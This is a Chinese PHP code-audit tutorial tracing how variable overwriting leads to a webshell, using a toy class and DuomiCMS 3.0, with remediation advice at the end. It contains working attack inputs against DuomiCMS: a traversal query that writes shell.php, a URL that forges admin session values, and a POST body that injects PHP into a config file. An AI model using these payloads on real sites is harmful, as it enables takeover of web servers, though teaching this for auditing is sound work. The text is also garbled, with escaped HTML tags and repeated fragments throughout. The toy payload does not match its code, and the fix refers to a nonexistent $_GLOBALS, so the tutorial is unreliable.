PHP代码审计：从变量覆盖到GetShell漏洞分析与利用<\/h1>

1. 漏洞概述<\/h2>
本教学文档将详细分析从变量覆盖漏洞到最终实现GetShell的完整过程，基于红日安全团队提供的案例和DuomiCMS 3.0的实际漏洞。<\/p>

2. 基础概念<\/h2>

2.1 变量覆盖漏洞<\/h3>
变量覆盖漏洞是指攻击者能够通过某种方式覆盖程序中已定义的变量值，通常由于不安全的变量注册机制导致。<\/p>

2.2 路径穿越<\/h3>
路径穿越(Path Traversal)允许攻击者通过特殊字符序列(如`..\/<\/code>)访问或操作文件系统中本不应被访问的位置。<\/p>`

3. 示例代码分析<\/h2>
3.1 Snowman示例代码<\/h3>
class<\/span> Carrot<\/span> {
<\/span><\/span>    var<\/span> $kw;
<\/span><\/span>    var<\/span> $v =<\/span> "set"<\/span>;
<\/span><\/span>    
<\/span><\/span>    function<\/span> __construct($key, $value) {
<\/span><\/span>        foreach<\/span>($_GET as<\/span> $key =><\/span> $value) {
<\/span><\/span>            $this-><\/span>$key =<\/span> $value;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    function<\/span> __destruct() {
<\/span><\/span>        $file =<\/span> '\/tmp\/'<\/span>.<\/span>$this-><\/span>kw<\/span>;
<\/span><\/span>        file_put_contents<\/span>($file, $this-><\/span>v<\/span>);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>new<\/span> Carrot<\/span>('kw'<\/span>, 'v'<\/span>);
<\/span><\/span><\/code><\/pre>3.2 漏洞点分析<\/h3>

变量覆盖<\/strong>：第10-11行的构造函数将$_GET<\/code>数组直接注册为类属性，可以覆盖第8行已定义的$this->kw<\/code>和$this->v<\/code><\/li>
路径穿越<\/strong>：第16行file_put_contents<\/code>的文件路径由用户可控的$this->kw<\/code>拼接而成<\/li>
文件写入<\/strong>：写入内容由$this->v<\/code>控制<\/li>
<\/ol>
3.3 利用Payload<\/h3>
?id=..\/var\/www\/html\/shell.php&shell=',)%0a<?php phpinfo();?>\/\/
<\/code><\/pre>
4. 实际案例分析：DuomiCMS 3.0<\/h2>
4.1 全局变量注册问题<\/h3>
duomiphp\/common.php<\/code>中的代码：<\/p>
foreach<\/span>($_REQUEST as<\/span> $_k=><\/span>$_v) {
<\/span><\/span>    if<\/span>( strlen<\/span>($_k)><\/span>0<\/span> &&<\/span> eregi<\/span>('^(cfg_|GLOBALS)'<\/span>,$_k) &&<\/span> !<\/span>isset<\/span>($_COOKIE[$_k]) ) {
<\/span><\/span>        exit<\/span>('Request var not allow!'<\/span>);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>foreach<\/span>(Array<\/span>('_GET'<\/span>,'_POST'<\/span>,'_COOKIE'<\/span>) as<\/span> $_request) {
<\/span><\/span>    foreach<\/span>(
<\/span><\/span>$$<\/span>
<\/span><\/span>_request<\/span> as<\/span> $_k =><\/span> $_v) ${$_k} =<\/span> _RunMagicQuotes<\/span>($_v);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>_RunMagicQuotes<\/code>函数使用addslashes<\/code>进行转义处理。<\/p>
4.2 文件写入点<\/h3>
admin\/admin_ping.php<\/code>中存在可利用的写文件代码：<\/p>
$weburl =<\/span> $_POST['weburl'<\/span>];
<\/span><\/span>$token =<\/span> $_POST['token'<\/span>];
<\/span><\/span>$data =<\/span> "<?php<\/span>\n<\/span>"<\/span>;
<\/span><\/span>$data .=<\/span> "<\/span>\$<\/span>weburl = <\/span>\"<\/span>$weburl\<\/span>"<\/span>;\n<\/span>";
<\/span><\/span><\/span><\/span>$data<\/span> .= "<\/span>\<\/span>$token =<\/span> \<\/span>"<\/span>$token\<\/span>"<\/span>;\n<\/span>";
<\/span><\/span><\/span><\/span>$data<\/span> .= "<\/span>?><\/span>";
<\/span><\/span><\/span>$file = dirname(__FILE__)."\/..\/..\/duomiphp\/common.inc.php";
<\/span><\/span><\/span>$fp = fopen($file,"w");
<\/span><\/span><\/span>fwrite($fp,$data);
<\/span><\/span><\/span>fclose($fp);
<\/span><\/span><\/span><\/code><\/pre>4.3 身份认证绕过<\/h3>
duomiphp\/check.admin.php<\/code>中的认证检查：<\/p>
if<\/span>(!<\/span>isset<\/span>($_SESSION['duomi_user_name'<\/span>])) {
<\/span><\/span>    header<\/span>("Location: login.php"<\/span>);
<\/span><\/span>    exit<\/span>();
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>通过变量覆盖伪造session：<\/p>
http:\/\/localhost\/member\/share.php?_SESSION[duomi_group_]=1&_SESSION[duomi_admin_]=1
<\/code><\/pre>
4.4 完整利用流程<\/h3>

利用变量覆盖伪造管理员session<\/li>
访问admin\/admin_ping.php<\/code>写入WebShell<\/li>
POST数据包示例：<\/li>
<\/ol>
POST \/admin\/admin_ping.php?action=set HTTP\/1.1
Host: www.localhost.com
Content-Type: application\/x-www-form-urlencoded
Content-Length: 34

weburl=";phpinfo();\/\/&token=
<\/code><\/pre>
5. 防御措施<\/h2>
5.1 修复方案<\/h3>

禁止注册超全局变量<\/strong>：<\/li>
<\/ol>
foreach<\/span>(Array<\/span>('_GET'<\/span>,'_POST'<\/span>,'_COOKIE'<\/span>) as<\/span> $_request) {
<\/span><\/span>    foreach<\/span>(
<\/span><\/span>$$<\/span>
<\/span><\/span>_request<\/span> as<\/span> $_k =><\/span> $_v) {
<\/span><\/span>        if<\/span>(isset<\/span>($_GLOBALS[$_k])) {
<\/span><\/span>            die<\/span>('Request var not allow!'<\/span>);
<\/span><\/span>        }
<\/span><\/span>        ${$_k} =<\/span> _RunMagicQuotes<\/span>($_v);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
严格过滤文件路径<\/strong>：<\/li>
<\/ol>
$file =<\/span> realpath<\/span>(dirname<\/span>(__FILE__<\/span>).<\/span>"\/..\/..\/duomiphp\/common.inc.php"<\/span>);
<\/span><\/span>if<\/span>(strpos<\/span>($file, '\/duomiphp\/'<\/span>) ===<\/span> false<\/span>) {
<\/span><\/span>    die<\/span>('Invalid file path!'<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
加强身份验证<\/strong>：<\/li>
<\/ol>
if<\/span>($_SESSION['duomi_admin_'<\/span>] !=<\/span> 1<\/span> ||<\/span> $_SESSION['duomi_group_'<\/span>] !=<\/span> 1<\/span>) {
<\/span><\/span>    die<\/span>('Access denied!'<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>5.2 最佳实践<\/h3>

避免使用extract()<\/code>、parse_str()<\/code>等可能导致变量覆盖的函数<\/li>
对用户输入进行严格的白名单验证<\/li>
使用绝对路径并检查路径合法性<\/li>
关键操作增加二次验证<\/li>
最小权限原则运行Web服务<\/li>
<\/ol>
6. 总结<\/h2>
本教学文档详细分析了从变量覆盖漏洞到GetShell的完整利用链，通过Snowman示例代码和DuomiCMS 3.0实际案例，展示了漏洞的产生原理、利用方法和防御措施。理解这类漏洞有助于开发更安全的PHP应用程序和进行有效的代码审计。<\/p>

PHP代码审计：从变量覆盖到GetShell漏洞分析与利用<\/h1>

1. 漏洞概述<\/h2> 本教学文档将详细分析从变量覆盖漏洞到最终实现GetShell的完整过程，基于红日安全团队提供的案例和DuomiCMS 3.0的实际漏洞。<\/p>

2. 基础概念<\/h2>

2.1 变量覆盖漏洞<\/h3> 变量覆盖漏洞是指攻击者能够通过某种方式覆盖程序中已定义的变量值，通常由于不安全的变量注册机制导致。<\/p>

2.2 路径穿越<\/h3> 路径穿越(Path Traversal)允许攻击者通过特殊字符序列(如..\/<\/code>)访问或操作文件系统中本不应被访问的位置。<\/p>

4. 实际案例分析：DuomiCMS 3.0<\/h2>

5. 防御措施<\/h2>

1. 漏洞概述<\/h2>
本教学文档将详细分析从变量覆盖漏洞到最终实现GetShell的完整过程，基于红日安全团队提供的案例和DuomiCMS 3.0的实际漏洞。<\/p>

2.1 变量覆盖漏洞<\/h3>
变量覆盖漏洞是指攻击者能够通过某种方式覆盖程序中已定义的变量值，通常由于不安全的变量注册机制导致。<\/p>

2.2 路径穿越<\/h3>
路径穿越(Path Traversal)允许攻击者通过特殊字符序列(如`..\/<\/code>)访问或操作文件系统中本不应被访问的位置。<\/p>`